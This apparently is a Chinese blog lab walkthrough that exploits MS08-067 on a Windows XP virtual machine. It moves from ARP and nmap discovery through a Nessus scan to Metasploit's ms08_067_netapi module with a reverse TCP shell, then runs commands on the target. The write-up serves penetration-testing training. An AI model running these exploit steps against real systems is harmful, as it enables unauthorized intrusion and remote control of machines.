利用 ms08_067 对 XP 进行渗透

文章目录

  • 利用 ms08_067 对 XP 进行渗透
    • 一、项目要求
    • 二、项目实施
      • 1. 实施目标
      • 2. 实施方案
        • 2.1 扫描该网段存活的主机
        • 2.2 使用nmap 判断目标主机IP地址
        • 2.3 使用 nessus 扫描该系统漏洞
        • 2.4 使用 Metasploit 对 XP 进行渗透
    • 三、总结

一、项目要求

  1. 渗透到 XP系统
  2. 在系统中执行几条命令

二、项目实施

1. 实施目标

  1. 使用工具寻找目标内存活的主机
  2. 使用工具,判断其操作系统,及相关信息收集
  3. 扫描该系统的漏洞,进行复现。
  4. 实验环境 (若实验过程中,出现没有写出工具,默认为kali 自带)
  • nessus 8.10
  • kali Linux 2019.1a
  • windows xp sp3(目标主机)
  • windows 7 (用于模仿真实环境)

2. 实施方案

2.1 扫描该网段存活的主机

已知该主机是内网的一个主机,并是xp系统,我们先使用arp脚本探测该主机内网,网段

root@fengzilin53:~# ./arping1.sh eth0

arp脚本内容

#!/bin/bash
if [ "$#" -ne 1 ];then       #判断用户是否输入了至少一个参数如果没有输入参数,输出提示信息并退出echo "Usage - ./arping.sh [interface]"
echo "Excample - ./arping.sh eth0"
echo "Example will perform an ARP scan of the local subnet to which eth0 is assigned"   exit
fi
interface=$1             #将用户输入的参数传递给 interface 变量
prefix=$(ifconfig $interface | grep "inet " | cut -d 't' -f 2 | cut -d '.' -f 1-3)  #获取本机 IP地址网段 192.168.1
#对整个网段进行arping
for addr in $(seq 1 254);do arping -c 1 $prefix.$addr | grep "bytes from" | cut -d" " -f 5 | cut -d "(" -f 2 | cut -d")" -f 1
done

使用arp脚本探测完目标网段,我们在使用netdiscover 探测存活的主机范围

root@fengzilin53:~# netdiscover -i eth0 -r 192.168.37.0/24

小结:

使用内网嗅探,无被发现

获得IP地址段为 :192.168.37.141-142

2.2 使用nmap 判断目标主机IP地址

root@fengzilin53:~# nmap -sS -O 192.168.37.140-142
Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-05 17:12 CST
Nmap scan report for 192.168.37.141
Host is up (0.0061s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:08:54:7F (VMware)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hopNmap scan report for 192.168.37.142
Host is up (0.053s latency).
Not shown: 993 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
2869/tcp  open  icslap
5357/tcp  open  wsdapi
10243/tcp open  unknown
MAC Address: 00:0C:29:6E:D2:3B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone
Running: Microsoft Windows 2008|8.1|7|Phone|Vista
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
OS details: Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hopOS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (2 hosts up) scanned in 28.73 seconds

小结:

通过nmap 扫描该地址段获取信息判断

192.168.37.141 为XP 为目标主机,并且开放 端口为 135 ,139,445 系统版本为 Microsoft Windows XP SP2 or SP3

2.3 使用 nessus 扫描该系统漏洞

使用nessus的高级扫描

填写 ip地址

开启扫描

扫描结果有一个

发现有个漏洞 6个可执行的漏洞

是扫描出来了 MS08-067

2.4 使用 Metasploit 对 XP 进行渗透

2.4.1 在命令终端输入

root@fengzilin53:~# systemctl start postgresql.service    //启动postgresql数据库
root@fengzilin53:~# systemctl enable postgresql           //设置为开机自启

2.4.2 打开kali 在终端输入 以下,启动 Metasploit

root@fengzilin53:~# msfconsole

2.4.3 在命令终端 使用 search 命令 ,搜索该漏洞对应的模块

msf5 > search ms08_067

2.4.4 启动这渗透攻击模块查看基本信息并指定一个攻击载荷

msf5 > use exploit/windows/smb/ms08_067_netapi    //进入渗透模块
msf5 exploit(windows/smb/ms08_067_netapi) > show payloads   //查看攻击载荷

msf5 exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp //设置攻击载荷
payload => generic/shell_reverse_tcp

2.4.5 完成渗透攻击模块与攻击载荷模块的选择之后,查看配置渗透攻击所需的配置选项

msf5 exploit(windows/smb/ms08_067_netapi) > show options

查看渗透攻击模块的攻击平台,这里支持60多种,不同的操作系统平台版本

2.4.6 上面我们扫描的系统为sp3 这里我们用34 中文简体

并设置对应的参数,这里37.138 为本机Kali IP地址

msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.37.141   //目标IP地址 也就是XP
RHOST => 192.168.37.141
msf5 exploit(windows/smb/ms08_067_netapi) > set LPORT 4444             //这里回到控制主机的端口为 4444
LPORT => 4444
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.37.138    //本机IP 地址
LHOST => 192.168.37.138
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34               //目标系统类型为 34号
target => 34

2.4.7 查看设置的值,是否正确

msf5 exploit(windows/smb/ms08_067_netapi) > show options

2.4.8 使用 run 命令发起渗透攻击

2.4.9 出现这个成功拿取权限 并执行 ipconfig 命令查看该IP地址

//若出现乱码,将终端的兼容性,改为 GBK 即可
C:\WINDOWS\system32>

执行shell命令查看系统信息 systeminfo

三、总结

  1. 本章 运用了 从主机发现,到信息搜集,在渗透拿权,从无到有,一步一步渗透到系统内,这也是渗透的基本思路

  2. 总结一下,Metasploit 的思路 如图

使用MSF 利用 ms08_067 对 XP 进行渗透相关推荐

  1. kail利用msf工具对MS12-020漏洞进行渗透测试

    kail利用msf工具对MS12-020漏洞进行渗透测试 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞 kail利用msf工具对MS12-020漏洞进行渗透 ...

  2. kali:Nessus扫描漏洞并用msf利用攻击xp系统

    Nessus扫描漏洞 1.启动nessus服务 /bin/systemctl start nessusd.service 2.在浏览器打开https://192.168.50.128:8834/,登陆 ...

  3. cs linux内网渗透,记一次利用cs进行内网渗透的过程

    记一次利用cs进行内网渗透的过程 ​首先搭建好cs的服务端和客户端连接,下面正式进行渗透 环境 kali:192.168.0.226 域控机:192.168.0.138 成员机:192.168.0.2 ...

  4. 利用Nmap对MS-SQLSERVER进行渗透

    利用Nmap对MS-SQLSERVER进行渗透 如今Nmap的脚本引擎从一个普通的端口扫描器转变为具有攻击性的渗透测试工具.随着nmap各种脚本的存在.到目前为止,我们甚至可以进行完整的SQL数据库渗 ...

  5. 2019年赣州市赛任务四利用python脚本进行web渗透测试

    任务四:利用python脚本进行web渗透测试 任务环境说明: 服务器场景名称: W-WebServ2008 服务器场景操作系统:Microsoft Windows2008 Server 服务器场景用 ...

  6. kail利用msf工具对ms10-087漏洞入侵渗透WinXP

    1.实验环境: Kali2020:10.20.29.129 Windows 2003:10.20.29.137 两台虚拟机能够相互ping通 2.实验步骤 1, 启动Metasploit 2,查找和M ...

  7. kail利用msf工具对ms11-003漏洞入侵渗透Win7

    前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.2 ...

  8. MSF利用永恒之蓝渗透win2003

    1.信息收集 (1)使用Nmap工具进行扫描,发现开放了445端口,尝试利用ms17_010漏洞. (2)运行metasploit. 2.漏洞探测 (1)查看漏洞模块. (2)使用Auxiliary ...

  9. MSF(六):后渗透

    后渗透测试 安全牛学习Metasploit Framework笔记 一.已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二.基于已有session扩大战果 ...

最新文章

  1. Dubbo 如何成为连接异构微服务体系的最佳服务开发框架
  2. 快速了解 ASP.NET Core Blazor
  3. 蓝桥杯 ALGO-28 算法训练 星际交流
  4. java能不能不用jvm_Java、JVM和操作系统之间的关系,写给新人,
  5. tf.Graph()函数
  6. Unity中一个安卓设备拆装项目,从使用到放弃ab包过程记录
  7. java parser .java_JDK的Parser来解析Java源代码详解
  8. navicat报错SSH:Unable to load key
  9. KEIL环境中添加宏定义方法
  10. 高光谱遥感图像处理与信息提取综述
  11. 伦敦大学金史密斯学院计算机专业,伦敦大学金史密斯学院计算机与信息系统本科.pdf...
  12. 代码 bug 嗅探器:Sanitizer
  13. kafka topic消息分配partition规则
  14. 抖音小程序配置webview域名
  15. Intel有那些45纳米的CPU
  16. Android使用RecyclerView实现仿微信联系人列表
  17. OpenCVForUnity 透视矫正、透视变换
  18. 数学基础从高一开始3、集合的基本运算
  19. 以前有个搜刮音乐_在终端上使用PHP搜刮Google建议
  20. 原生JS实现拖拽垂直进度条

热门文章

  1. daoutil的mysql_功能齐全的Dao工具类
  2. 链表带环问题(详解)
  3. pcre之linux编译
  4. 黑冰防火墙的设置和卸载
  5. HTML DOM selectedIndex 属性
  6. 怎样在主机上安装deepin Linux
  7. c语言自动刷票代码,简单刷票系统 c语言实现
  8. 零数观点 | 林博士受邀参加第13届亚洲太阳能光伏创新大会
  9. 恶意app分析及防范
  10. C++ 24点游戏算法